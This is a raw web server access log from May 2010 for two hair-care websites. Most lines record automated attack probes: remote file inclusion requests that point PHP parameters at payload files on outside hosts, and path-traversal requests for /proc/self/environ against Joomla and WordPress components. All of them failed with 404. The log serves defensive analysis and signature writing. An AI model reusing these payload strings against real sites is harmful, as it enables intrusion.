12.204.180.43 - - [24/May/2010:06:35:00 -0700] "GET /logs/access_100201.log%20%20/alpha.php?Absolute_Path=http://www.talkpic.com/bbs/icon/private_name/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
12.204.180.43 - - [24/May/2010:06:35:00 -0700] "GET /alpha.php?Absolute_Path=http://www.talkpic.com/bbs/icon/private_name/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
12.204.180.43 - - [24/May/2010:06:35:00 -0700] "GET /logs/alpha.php?Absolute_Path=http://www.talkpic.com/bbs/icon/private_name/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.249.68.8 - - [24/May/2010:06:35:27 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
12.204.180.43 - - [24/May/2010:06:35:35 -0700] "GET /alpha.php?Absolute_Path=http://www.talkpic.com/bbs/icon/private_name/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
12.204.180.43 - - [24/May/2010:06:35:35 -0700] "GET /logs/access_100201.log/alpha.php?Absolute_Path=http://www.talkpic.com/bbs/icon/private_name/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
12.204.180.43 - - [24/May/2010:06:35:35 -0700] "GET /logs/alpha.php?Absolute_Path=http://www.talkpic.com/bbs/icon/private_name/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
12.204.180.43 - - [24/May/2010:06:35:44 -0700] "GET /alpha.php?Absolute_Path=http://www.talkpic.com/bbs/icon/private_name/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
12.204.180.43 - - [24/May/2010:06:35:44 -0700] "GET /logs/access_100201.log/alpha.php?Absolute_Path=http://www.talkpic.com/bbs/icon/private_name/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
12.204.180.43 - - [24/May/2010:06:35:44 -0700] "GET /logs/alpha.php?Absolute_Path=http://www.talkpic.com/bbs/icon/private_name/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:06:36:47 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:06:36:47 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:06:36:47 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:06:36:47 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:06:36:49 -0700] "GET /logs//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:06:36:49 -0700] "GET /logs//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:06:36:49 -0700] "GET /logs//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:06:36:49 -0700] "GET /logs//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:06:36:51 -0700] "GET /logs/access_100503.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:06:36:52 -0700] "GET /logs/access_100503.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:06:36:52 -0700] "GET /logs/access_100503.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:06:36:52 -0700] "GET /logs/access_100503.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:06:38:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12611 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
216.129.119.43 - - [24/May/2010:06:39:00 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
64.27.53.238 - - [24/May/2010:06:39:03 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [24/May/2010:06:39:03 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [24/May/2010:06:39:03 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [24/May/2010:06:39:08 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [24/May/2010:06:39:08 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [24/May/2010:06:39:08 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [24/May/2010:06:40:50 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [24/May/2010:06:40:50 -0700] "GET /logs/access_100125.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [24/May/2010:06:40:50 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [24/May/2010:06:40:51 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [24/May/2010:06:40:51 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [24/May/2010:06:40:51 -0700] "GET /logs/access_100125.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [24/May/2010:06:40:58 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [24/May/2010:06:40:59 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.54.206.66 - - [24/May/2010:06:41:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "growlonghairfast.com"
74.54.206.66 - - [24/May/2010:06:41:21 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "growlonghairfast.com"
195.9.14.148 - - [24/May/2010:06:41:36 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.9.14.148 - - [24/May/2010:06:41:36 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
195.9.14.148 - - [24/May/2010:06:41:37 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
195.9.14.148 - - [24/May/2010:06:41:37 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
59.42.10.71 - - [24/May/2010:06:44:24 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
59.42.10.71 - - [24/May/2010:06:44:29 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
88.191.94.188 - - [24/May/2010:06:47:22 -0700] "GET /awstats//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [24/May/2010:06:47:22 -0700] "GET /logs//awstats//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [24/May/2010:06:47:22 -0700] "GET /logs/access.log%20%20//awstats//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.201.66.45 - - [24/May/2010:06:48:20 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)" "growlonghairfast.com"
91.201.66.45 - - [24/May/2010:06:48:20 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)" "growlonghairfast.com"
80.65.166.74 - - [24/May/2010:06:49:59 -0700] "GET /logs/access_100510.log///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [24/May/2010:06:50:24 -0700] "GET /logs//awstats//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [24/May/2010:06:50:24 -0700] "GET /logs/access.log%20%20//awstats//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [24/May/2010:06:50:24 -0700] "GET /awstats//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.65.166.74 - - [24/May/2010:06:50:45 -0700] "GET /logs/access_100510.log///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [24/May/2010:06:50:53 -0700] "GET /logs/access_100503.log///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [24/May/2010:06:51:27 -0700] "GET /logs/access.log///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:06:52:16 -0700] "GET /logs/ HTTP/1.1" 200 5514 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
80.65.166.74 - - [24/May/2010:06:52:24 -0700] "GET /logs/access_100503.log///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.65.166.74 - - [24/May/2010:06:52:56 -0700] "GET /logs/access.log///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.78.123 - - [24/May/2010:06:54:46 -0700] "GET /logs/access_100503.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
87.106.78.123 - - [24/May/2010:06:54:46 -0700] "GET /logs/access_100503.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
87.106.78.123 - - [24/May/2010:06:54:46 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:06:54:46 -0700] "GET /logs/access_100503.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.106.78.123 - - [24/May/2010:06:54:47 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
87.106.78.123 - - [24/May/2010:06:54:47 -0700] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:06:54:47 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.106.78.123 - - [24/May/2010:06:54:47 -0700] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:06:54:47 -0700] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:06:54:51 -0700] "GET /logs/access_100503.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:06:54:51 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:06:54:51 -0700] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.106.78.123 - - [24/May/2010:06:55:38 -0700] "GET /logs/access.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.freehairsecrets.com"
87.106.78.123 - - [24/May/2010:06:55:38 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.freehairsecrets.com"
87.106.78.123 - - [24/May/2010:06:55:38 -0700] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.freehairsecrets.com"
87.106.78.123 - - [24/May/2010:06:55:38 -0700] "GET /logs/access.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.freehairsecrets.com"
87.106.78.123 - - [24/May/2010:06:55:38 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.freehairsecrets.com"
87.106.78.123 - - [24/May/2010:06:55:39 -0700] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.freehairsecrets.com"
87.250.77.10 - - [24/May/2010:06:55:49 -0700] "GET /logs/access.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
87.250.77.10 - - [24/May/2010:06:55:49 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
87.250.77.10 - - [24/May/2010:06:55:49 -0700] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
87.250.77.10 - - [24/May/2010:06:55:50 -0700] "GET /logs/access.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
87.250.77.10 - - [24/May/2010:06:55:51 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
87.250.77.10 - - [24/May/2010:06:55:51 -0700] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
64.62.251.26 - - [24/May/2010:06:56:17 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.62.251.26 - - [24/May/2010:06:56:17 -0700] "GET /include/write.php?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.62.251.26 - - [24/May/2010:06:56:17 -0700] "GET /logs//include/write.php?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.129.119.12 - - [24/May/2010:06:58:31 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
78.138.88.235 - - [24/May/2010:06:58:51 -0700] "GET /logs/access_100201.log%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.235 - - [24/May/2010:06:58:51 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.235 - - [24/May/2010:06:58:51 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.235 - - [24/May/2010:06:59:09 -0700] "GET /logs///components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.235 - - [24/May/2010:06:59:09 -0700] "GET /logs/access_100510.log%20%20///components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.235 - - [24/May/2010:06:59:09 -0700] "GET //components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.235 - - [24/May/2010:06:59:23 -0700] "GET /logs/access_100503.log%20%20///components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.235 - - [24/May/2010:06:59:33 -0700] "GET //components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.138.88.235 - - [24/May/2010:06:59:33 -0700] "GET /logs///components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.138.88.235 - - [24/May/2010:06:59:33 -0700] "GET /logs/access.log%20%20///components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.250.77.10 - - [24/May/2010:06:59:50 -0700] "GET /logs/access_100503.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:06:59:50 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:06:59:50 -0700] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:07:00:59 -0700] "GET /logs/access.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
87.250.77.10 - - [24/May/2010:07:00:59 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
87.250.77.10 - - [24/May/2010:07:00:59 -0700] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
78.138.88.235 - - [24/May/2010:07:02:31 -0700] "GET /logs/access_100201.log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.246.241 - - [24/May/2010:07:06:00 -0700] "GET /logs/access_100503.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
77.79.246.241 - - [24/May/2010:07:06:00 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
77.79.246.241 - - [24/May/2010:07:06:01 -0700] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
77.79.246.241 - - [24/May/2010:07:07:19 -0700] "GET /logs/access.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
77.79.246.241 - - [24/May/2010:07:07:19 -0700] "GET /index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
77.79.246.241 - - [24/May/2010:07:07:19 -0700] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
66.230.221.15 - - [24/May/2010:07:09:46 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:07:09:46 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:07:09:46 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
66.230.221.15 - - [24/May/2010:07:09:47 -0700] "GET /logs/access_100426.log%20%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "growlonghairfast.com"
212.117.165.184 - - [24/May/2010:07:12:58 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "growlonghairfast.com"
212.117.165.184 - - [24/May/2010:07:12:58 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "growlonghairfast.com"
87.106.78.123 - - [24/May/2010:07:18:36 -0700] "GET /logs/access_100426.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
